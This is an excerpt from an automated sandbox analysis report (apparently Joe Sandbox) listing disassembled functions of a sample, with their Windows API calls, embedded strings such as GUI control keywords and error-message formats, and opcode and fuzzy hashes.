                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                  • String ID: @$ThumbnailClass
                                                                  • API String ID: 1788623398-1539354611
                                                                  • Opcode ID: 737d2faf89993890c8aa3ac5b4c62957a59ac3f82730898e75dd94e86b46be42
                                                                  • Instruction ID: 7404dd94ff04c0edfa5fbb77a467aa9422b6c0b341e4c73c2b52159f6cc68044
                                                                  • Opcode Fuzzy Hash: 737d2faf89993890c8aa3ac5b4c62957a59ac3f82730898e75dd94e86b46be42
                                                                  • Instruction Fuzzy Hash: 2381D37140831A9FDB04DF10E885FAA77E8FF84324F14846AFD899A096DB34DD45EBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                  • API String ID: 1038674560-1810252412
                                                                  • Opcode ID: 0a188ad9989ccbaf35f606f7541f8f641d54eaaa6c1dc5df1013e6335170356e
                                                                  • Instruction ID: 4833abadd4f4c93ba86c66482e658b01d8a045e4d3b1966c4643b894d8c83072
                                                                  • Opcode Fuzzy Hash: 0a188ad9989ccbaf35f606f7541f8f641d54eaaa6c1dc5df1013e6335170356e
                                                                  • Instruction Fuzzy Hash: E031D031A40219A6EB14FB61DC43EED73F4AF10760F600126FA51B10D9EB66AE84E653
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadIconW.USER32(00000063), ref: 00F2CBAA
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F2CBBC
                                                                  • SetWindowTextW.USER32(?,?), ref: 00F2CBD3
                                                                  • GetDlgItem.USER32 ref: 00F2CBE8
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00F2CBEE
                                                                  • GetDlgItem.USER32 ref: 00F2CBFE
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00F2CC04
                                                                  • SendDlgItemMessageW.USER32 ref: 00F2CC25
                                                                  • SendDlgItemMessageW.USER32 ref: 00F2CC3F
                                                                  • GetWindowRect.USER32 ref: 00F2CC48
                                                                  • SetWindowTextW.USER32(?,?), ref: 00F2CCB3
                                                                  • GetDesktopWindow.USER32 ref: 00F2CCB9
                                                                  • GetWindowRect.USER32 ref: 00F2CCC0
                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F2CD0C
                                                                  • GetClientRect.USER32(?,?), ref: 00F2CD19
                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F2CD3E
                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F2CD69
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                  • String ID:
                                                                  • API String ID: 3869813825-0
                                                                  • Opcode ID: 9f37df02798d715d99e1515c9dea6ce73f45277de22095713de38ce041ae364c
                                                                  • Instruction ID: cd772deb7f0810ecc21be7bf1c66600e7e2782c5a86fe500a42f38eff0641af0
                                                                  • Opcode Fuzzy Hash: 9f37df02798d715d99e1515c9dea6ce73f45277de22095713de38ce041ae364c
                                                                  • Instruction Fuzzy Hash: CD518D70900709EFDB209FA8DE89B6FBBF5FF44714F100918E556A25A0CBB5A914EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F5A87E
                                                                  • DestroyWindow.USER32(?,?), ref: 00F5A8F8
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  • CreateWindowExW.USER32 ref: 00F5A972
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F5A994
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5A9A7
                                                                  • DestroyWindow.USER32(00000000), ref: 00F5A9C9
                                                                  • CreateWindowExW.USER32 ref: 00F5AA00
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5AA19
                                                                  • GetDesktopWindow.USER32 ref: 00F5AA32
                                                                  • GetWindowRect.USER32 ref: 00F5AA39
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F5AA51
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F5AA69
                                                                    • Part of subcall function 00ED29AB: GetWindowLongW.USER32(?,000000EB), ref: 00ED29BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 1297703922-3619404913
                                                                  • Opcode ID: 728dd3dda77e2e3d4d5d2ad930a793eff6a18b8b9d2ed39b1cc9d2a1c4b91d3c
                                                                  • Instruction ID: 49800bb0fc830a0d71de5a288a6a0bf9a433245f796a05f4c17f9877850cb35f
                                                                  • Opcode Fuzzy Hash: 728dd3dda77e2e3d4d5d2ad930a793eff6a18b8b9d2ed39b1cc9d2a1c4b91d3c
                                                                  • Instruction Fuzzy Hash: 8B71A971550308AFD721DF28C808FAB77E5EB88310F14061DFA86872A1DB75E915EB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00F5CCCF
                                                                    • Part of subcall function 00F5B1A9: ClientToScreen.USER32(?,?), ref: 00F5B1D2
                                                                    • Part of subcall function 00F5B1A9: GetWindowRect.USER32 ref: 00F5B248
                                                                    • Part of subcall function 00F5B1A9: PtInRect.USER32(?,?,00F5C6BC), ref: 00F5B258
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00F5CD38
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F5CD43
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F5CD66
                                                                  • _wcscat.LIBCMT ref: 00F5CD96
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F5CDAD
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00F5CDC6
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00F5CDDD
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00F5CDFF
                                                                  • DragFinish.SHELL32(?), ref: 00F5CE06
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F5CEF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                  • API String ID: 169749273-3440237614
                                                                  • Opcode ID: a50edbc7c82b3fab706a504f99bb9998f46ae294863d7960993aa9730fc543d3
                                                                  • Instruction ID: f236a92c7b0c2bb7d7dc1a2c6001ce830f6dd378a5bb8ba2dee975f34b86ebbf
                                                                  • Opcode Fuzzy Hash: a50edbc7c82b3fab706a504f99bb9998f46ae294863d7960993aa9730fc543d3
                                                                  • Instruction Fuzzy Hash: B9618D71108304AFC711EF50DC85D9FBBF8EF88350F100A1EF6A6921A1DB719A49DBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000000), ref: 00F3831A
                                                                  • VariantCopy.OLEAUT32(00000000,?), ref: 00F38323
                                                                  • VariantClear.OLEAUT32(00000000), ref: 00F3832F
                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F3841D
                                                                  • __swprintf.LIBCMT ref: 00F3844D
                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00F38479
                                                                  • VariantInit.OLEAUT32(?), ref: 00F3852A
                                                                  • SysFreeString.OLEAUT32(?), ref: 00F385BE
                                                                  • VariantClear.OLEAUT32(?), ref: 00F38618
                                                                  • VariantClear.OLEAUT32(?), ref: 00F38627
                                                                  • VariantInit.OLEAUT32(00000000), ref: 00F38665
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                  • API String ID: 3730832054-3931177956
                                                                  • Opcode ID: 89ae7e93a06e5255a97cff92d154a9edc2e5e3b425cff272641d84d9c877b421
                                                                  • Instruction ID: 07a8ee603bfa779404e369b816bb7c187cad32a1ce588cdda6cc15ad0b9004f4
                                                                  • Opcode Fuzzy Hash: 89ae7e93a06e5255a97cff92d154a9edc2e5e3b425cff272641d84d9c877b421
                                                                  • Instruction Fuzzy Hash: 04D1D172A04219DBCB209F61C885BAEB7B4BF047A0F248555F405EB281CF78DC46FBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F54A61
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F54AAC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 3974292440-4258414348
                                                                  • Opcode ID: 7a1e46a79a96a872c9f0b63d20c3b8dccd6a9b4316ca98508774e694c562bf59
                                                                  • Instruction ID: 2b6304481867499246442b682efde490cafd9f62e722e13ed587ff1de801cd45
                                                                  • Opcode Fuzzy Hash: 7a1e46a79a96a872c9f0b63d20c3b8dccd6a9b4316ca98508774e694c562bf59
                                                                  • Instruction Fuzzy Hash: 75918F702007119BCB14EF20C851A69B7E2EF94354F108859FD966B3A3DB35FD8AEB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadImageW.USER32 ref: 00F5BF26
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F597E7), ref: 00F5BF82
                                                                  • LoadImageW.USER32 ref: 00F5BFBB
                                                                  • LoadImageW.USER32 ref: 00F5BFFE
                                                                  • LoadImageW.USER32 ref: 00F5C035
                                                                  • FreeLibrary.KERNEL32(?), ref: 00F5C041
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F5C051
                                                                  • DestroyIcon.USER32(?,?,?,?,?,00F597E7), ref: 00F5C060
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F5C07D
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F5C089
                                                                    • Part of subcall function 00EF312D: __wcsicmp_l.LIBCMT ref: 00EF31B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 1212759294-1154884017
                                                                  • Opcode ID: 7a79424082e1276ea8eef84a6827da9cf2cbce8a5535bdbb3209062a8b9adef6
                                                                  • Instruction ID: b091af1e32c5900fc5ef37317013f2e8c5c4bd78a82351f3246644de157ce63d
                                                                  • Opcode Fuzzy Hash: 7a79424082e1276ea8eef84a6827da9cf2cbce8a5535bdbb3209062a8b9adef6
                                                                  • Instruction Fuzzy Hash: DE61E371900618FFEB14DF64DC45BBE77A8EB08721F204109FE25E61D1DBB4A984EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 00F3E31F
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F3E32F
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F3E33B
                                                                  • __wsplitpath.LIBCMT ref: 00F3E399
                                                                  • _wcscat.LIBCMT ref: 00F3E3B1
                                                                  • _wcscat.LIBCMT ref: 00F3E3C3
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3E3D8
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E3EC
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E41E
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E43F
                                                                  • _wcscpy.LIBCMT ref: 00F3E44B
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F3E48A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                  • String ID: *.*
                                                                  • API String ID: 3566783562-438819550
                                                                  • Opcode ID: 1d89818d3d8f9aa2917d4f6ab9dd3c5710125b3c46955fc3512475fa70ec2307
                                                                  • Instruction ID: 4d36905c2f9b78ddd5340bb63fb89ace6394eeb2ddb3d5d74cd00ee907627afd
                                                                  • Opcode Fuzzy Hash: 1d89818d3d8f9aa2917d4f6ab9dd3c5710125b3c46955fc3512475fa70ec2307
                                                                  • Instruction Fuzzy Hash: 98614AB65046459FCB10EF60C844A9FB3E8FF89320F04891EF99997291DB35E945CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F3A2C2
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F3A2E3
                                                                  • __swprintf.LIBCMT ref: 00F3A33C
                                                                  • __swprintf.LIBCMT ref: 00F3A355
                                                                  • _wprintf.LIBCMT ref: 00F3A3FC
                                                                  • _wprintf.LIBCMT ref: 00F3A41A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 311963372-3080491070
                                                                  • Opcode ID: 0b963cc64af073c4802ad8b23a98ac90e9ca5ef743f83cfd85f01e75641f439e
                                                                  • Instruction ID: 6a8101d52723f32c75078d6f06c8b95ee0fa20a742a5ee6c4cd2200946c5157c
                                                                  • Opcode Fuzzy Hash: 0b963cc64af073c4802ad8b23a98ac90e9ca5ef743f83cfd85f01e75641f439e
                                                                  • Instruction Fuzzy Hash: 2951867190024DAACF14EBE1CD46EEEB7B9EF14350F200196F505B20A2EB756F98EB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F43FF9,00000000), ref: 00F3009A
                                                                  • LoadStringW.USER32(00000000,?,00F1F8B8,00000001), ref: 00F300A3
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  • GetModuleHandleW.KERNEL32(00000000,00F97310,?,00000FFF,?,?,00F1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F43FF9,00000000,00000001), ref: 00F300C5
                                                                  • LoadStringW.USER32(00000000,?,00F1F8B8,00000001), ref: 00F300C8
                                                                  • __swprintf.LIBCMT ref: 00F30118
                                                                  • __swprintf.LIBCMT ref: 00F30129
                                                                  • _wprintf.LIBCMT ref: 00F301D2
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F301E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 984253442-2268648507
                                                                  • Opcode ID: a60aaf17bb1c4be649a6f4c8a7ef3fa0a216c59e0122f2d0e6757bdb07384967
                                                                  • Instruction ID: 14609409e5b7310476c14f9c1011f098997f8c40eb9765bc137bbde1b515440d
                                                                  • Opcode Fuzzy Hash: a60aaf17bb1c4be649a6f4c8a7ef3fa0a216c59e0122f2d0e6757bdb07384967
                                                                  • Instruction Fuzzy Hash: E2414D7280015DAACF14FBE1CD96DEEB7B9AF54340F2001A6F605B2092EE756F48DB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                  • CharLowerBuffW.USER32(?,?), ref: 00F3AA0E
                                                                  • GetDriveTypeW.KERNEL32 ref: 00F3AA5B
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3AAA3
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3AADA
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3AB08
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 2698844021-4113822522
                                                                  • Opcode ID: 146c6c47a768d87811467efb1b5d73288f1a9bee78626165379aefdff6c4304f
                                                                  • Instruction ID: f793adefaf10a0f13de40b71e4eab94afaf9c5d09f768e860f6ea39ecfb24546
                                                                  • Opcode Fuzzy Hash: 146c6c47a768d87811467efb1b5d73288f1a9bee78626165379aefdff6c4304f
                                                                  • Instruction Fuzzy Hash: F0516B711042499FC700EF11C88196AB3F5FF98768F10496DF895A72A2EB31EE06CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F3A852
                                                                  • __swprintf.LIBCMT ref: 00F3A874
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F3A8B1
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F3A8D6
                                                                  • _memset.LIBCMT ref: 00F3A8F5
                                                                  • _wcsncpy.LIBCMT ref: 00F3A931
                                                                  • DeviceIoControl.KERNEL32 ref: 00F3A966
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F3A971
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00F3A97A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F3A984
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 991681b6e2215d6acba03228ef8cb56bdc9833d6ad0ee2e4d66c976a56ce7747
                                                                  • Instruction ID: 0c360a0acbc566d16765875d6a3543a8b5bc329f5aadc682aa1aa1e67e3bc706
                                                                  • Opcode Fuzzy Hash: 991681b6e2215d6acba03228ef8cb56bdc9833d6ad0ee2e4d66c976a56ce7747
